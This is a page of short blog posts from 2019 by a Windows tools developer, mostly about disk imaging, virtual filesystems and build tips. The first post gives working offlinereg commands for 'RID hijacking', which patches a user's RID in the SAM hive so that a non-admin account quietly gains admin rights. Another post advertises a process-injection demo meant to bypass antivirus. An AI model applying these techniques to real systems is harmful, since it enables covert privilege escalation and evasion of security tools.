Août 182019

Following a post here on how to blank an account’s password using offlinereg, this time, lets see how to perform « RID hijacking ».

The local admin account has a 01F4 rid.
What about « patching » another (non admin) account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin task.
This is quite « stealthy » as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trust SAMSRV and SAMSRV trust the registry : everyone is happy…

This can work with the guest account as well.

I tested this with success from a winpe against windows 10.


Download/Discuss it here

Juil 252019

Create your own filesystem and mount it as either a logical drive or folder. Dokan (

Below a simple command line to mount a zip archive on X:
mount.exe /r /l x /x proxy_7zip.dll

Mount.exe is a generic code/binary independant of the filesystem you wish to create.
The filesystem is implemented in a proxy/dll.

Source code and binaries is available here.

7zip proxy example is here.

NFS proxy example is here.


Juil 252019

I had done a few proxies for ImDisk in the past based on the libyal libraries (vmdkqcowvhdewf).

This time, as the VDI image format is quite simple, I made my own proxy for VDI images.

Imdisk + Discutils could achieve the same except that discutils requires .Net 4.0 which is not always available.

As always the command line :

« server » -> devio –dll=proxy.dll;dllopen shm:test_proxy c:\temp\freedos.vdi
« client » -> imdisk -a -t proxy -o shm -o ro -f test_proxy -m x:
Use the start command in front of devio if you want to stuff it all in one batch.

Download/Discuss here.

Juil 222019

A demo to run a encrypted xored encrypted PE within the memory of another PE (and therefore possibly bypass anti virus softwares)

See about xoring / encrypting a file.

Code is currently set to use cmd.exe (x86/x64) as target host.

host32.exe/host64.exe are also provided in the zip if you wish the modify the code to use a « neutral » host.

Source code and binaries can be found here.

Mai 082019

I have added a 2 extra formats in latest version : VHD/VHDX and LZ4.

VHD/VHDX is using MS virtual disk API and LZ4 is using opensource LZ4 library.

While at it, I also added extra WIM compression methods (LZX and LZMS).


LZ4 is quite interesting as in some cases it is faster to compress thru LZ4 compared to using a RAW format and this despite the CPU overhead.

LZ4 files generated by Clonedisk are compatible with LZ4.exe.




Avr 242019

How to rebuild libvmdk (and possibly any VC project) so that it depends on msvcrt.dll and no longer on msvcrtxxx.dll.

Copy/paste from this post for archiving.

-first install VC2008 express (but should be OK with VC2010 express and possibly newer VS platforms)

-install WDK 7.1

-modify your VC2008 IDE settings search paths (include and libraries) by adding WDK 7.1 paths first in the list



-add msvcrt « legacy translator » library (msvcrt_win2000.obj) to Linker -> Input -> Additional Dependencies for both DLL projects (zlib and libvmdk)


-add specific preprocessor definitions to zlib project :



And voila :)

You should end up with the below, i.e a dependency to a msvcrt.dll


Avr 212019

Following some notes around netcat here and here.

Some extra commands to backup a disk over the network :

-listen on port 9000 and dump the raw file
nc -v -l -p 9000 > dump.img
(restore with nc -v -l -p 9000 < dump.img)

-same but compressed with lz4 via stdin
nc -v -l -p 9000 | lz4.exe -1 stdin -f dump.lz4
(restore with lz4 -l -c dump.lz4 | nc -v -l -p 9000
and not with nc -v -l -p 9000 -e « lz4.exe -c dump.lz4 »)

-the same but with 7zip
nc -v -l -p 9000 | 7z a dump.7z -si
(restore with 7z e dump.7z -so | nc -v -l -p 9000)

-the same but with bzip2
nc -v -l -p 9000 | bzip2 -z > dump.gz
(restore with bzip2 -cd < dump.gz | nc -v -l -p 9000)


lz4 can be downloaded here.
bzip2 can be downloaded here.
7-zip can be downloaded here.
netcat can be downloaded here.